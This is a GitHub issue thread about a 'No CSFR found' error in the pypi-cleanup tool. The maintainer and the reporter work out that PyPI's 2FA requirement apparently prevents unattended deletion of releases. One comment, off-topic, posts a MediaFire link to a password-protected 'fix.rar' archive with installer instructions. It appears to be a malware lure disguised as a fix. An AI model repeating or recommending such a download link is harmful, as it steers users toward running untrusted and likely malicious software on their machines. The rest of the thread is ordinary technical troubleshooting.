### ISSUE TITLE
No CSFR found Error

### ISSUE THREAD

**Issue by rtg0795** [arcivanov/pypi-cleanup#38]
Getting this error since few months. Anyone else facing this issue?
Any solution or ways to debug this?

Specs: 
Linux, Python 3.8 using pyenv

```
WARNING:root:!!! POSSIBLE DESTRUCTIVE OPERATION !!!
INFO:root:Will use the following patterns [re.compile('xx')] on package 'xx'
INFO:root:Found the following releases to `delete:`
INFO:root: xx
WARNING:root:!!! WILL ACTUALLY DELETE THINGS - LAST CHANCE TO CHANGE YOUR MIND !!!
WARNING:root:Sleeping for 5 seconds - Ctrl-C to abort!
INFO:root:Deleting 'xx version xx
Traceback (most recent call last):
  File "/usr/local/.pyenv/versions/3.8.0/bin/pypi-cleanup", line 10, in <module>
    sys.exit(main())
  File "/usr/local/.pyenv/versions/3.8.0/lib/python3.8/site-packages/pypi_cleanup/__init__.py", line 327, in main
    return PypiCleanup(**vars(args)).run()
  File "/usr/local/.pyenv/versions/3.8.0/lib/python3.8/site-packages/pypi_cleanup/__init__.py", line 257, in run
    raise ValueError(f"No CSFR found in {form_action}")
ValueError: No CSFR found in /manage/project/<package-name>/release/<version>/
```

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by arcivanov** [comment]
I'm not, I just used it a couple of weeks ago.

**Comment by arcivanov** [comment]
Are you on the latest version of pypi-cleanup?

**Comment by rtg0795** [comment]
> Are you on the latest version of pypi-cleanup?

Yes. Using latest one 

+ pip list
Package            Version 
------------------ --------
certifi            2024.7.4
charset-normalizer 3.3.2   
idna               3.7     
pip                19.2.3  
pypi-cleanup       0.1.7   
requests           2.32.3  
setuptools         41.2.0  
urllib3            2.2.2

**Comment by arcivanov** [comment]
This is Python 3.12.5, pypi-cleanup 0.1.7, just now:

```
$ pypi-cleanup -u karellen -p karellen-llvm-core -r '.*rc[12].*' -y
INFO:root:Running in DRY RUN mode
INFO:root:Will use the following patterns [re.compile('.*rc[12].*')] on package 'karellen-llvm-core'
INFO:root:Found the following releases to delete:
INFO:root: 19.1.0.0rc1.post62
INFO:root: 19.1.0.0rc2
INFO:root: 19.1.0.0rc2.post43
INFO:root: 19.1.0.0rc2.post45
INFO:root: 19.1.0.0rc2.post52
INFO:root: 19.1.0.0rc2.post59
INFO:root: 19.1.0.0rc2.post69
Password: 
Authentication code: 070370 
INFO:root:Would be deleting 'karellen-llvm-core' version 19.1.0.0rc1.post62, but not doing it!
INFO:root:Would be deleting 'karellen-llvm-core' version 19.1.0.0rc2, but not doing it!
INFO:root:Would be deleting 'karellen-llvm-core' version 19.1.0.0rc2.post43, but not doing it!
INFO:root:Would be deleting 'karellen-llvm-core' version 19.1.0.0rc2.post45, but not doing it!
INFO:root:Would be deleting 'karellen-llvm-core' version 19.1.0.0rc2.post52, but not doing it!
INFO:root:Would be deleting 'karellen-llvm-core' version 19.1.0.0rc2.post59, but not doing it!
INFO:root:Would be deleting 'karellen-llvm-core' version 19.1.0.0rc2.post69, but not doing it!
```

**Comment by arcivanov** [comment]
Could you please try another version of Python (3.10/11/12) and see if you have the same issue?

**Comment by rtg0795** [comment]
> Could you please try another version of Python (3.10/11/12) and see if you have the same issue?

Sure. I will try that. I feel that python version may not be the problem. 

One last question. Do you think not enabling 2FA can cause this issue in any way? We are using only password (getting through environment variable as per the documentation) and username. I see in the above log you are also using authentication code. If I remember, in the past 1 year PyPI have strictly enforced 2FA.  


My code was working smooth without any issues since 2022 (thats when we started deleting packages to save space in my organization) until recently ~ end of 2023 and beginning of 2024.

**Comment by arcivanov** [comment]
As you can see, I have 2FA enabled in the above scenario. Is it possible your username/password are wrong?

**Comment by arcivanov** [comment]
I just tried with bad username and good username and bad password and the behavior is normal:

```
Password: 
ERROR:root:Login for user karellen failed
```

and 

```
Password: 
ERROR:root:Login for user karellenblahblah failed
```

Could you perhaps try with a clean install in a python 3.12 and see if you can reproduce it?

**Comment by arcivanov** [comment]
> My code was working smooth without any issues since 2022 (thats when we started deleting packages to save space in my organization) until recently ~ end of 2023 and beginning of 2024.

On the other hand, if you don't have 2FA enabled on your account it may be why it doesn't work. Are you able to login by hand via a browser at all using the provided credentials?

**Comment by rtg0795** [comment]
Thanks @arcivanov for your responses. I don't have visibility of credentials to try these in my browser. It will take some time for me to replicate this using dummy PyPI account and packages.

**Comment by arcivanov** [comment]
> I don't have visibility of credentials to try these in my browser. It will take some time for me to replicate this using dummy PyPI account and packages.

What do you mean "you don't have visibility of credentials"? The credentials are required to authenticate pypi-cleanup :smile:  Or is it a sealed CI environment and logs are from there and you don't have access?

**Comment by rtg0795** [comment]
They are sealed in CI environment and providing logs from there  😅. If enabling 2FA is the only option, then we have to take down automation and go for manually trigger every week or so.

**Comment by arcivanov** [comment]
> They are sealed in CI environment and providing logs from there 😅. If enabling 2FA is the only option, then we have to take down automation and go for manually trigger every week or so.

Yep, I'm pretty sure you can't login without 2FA anymore at all and 2FA requires manually entering the code. Unless there is a feature where you can use an API application access code via the same UI, automating the process is no longer possible. Sorry!
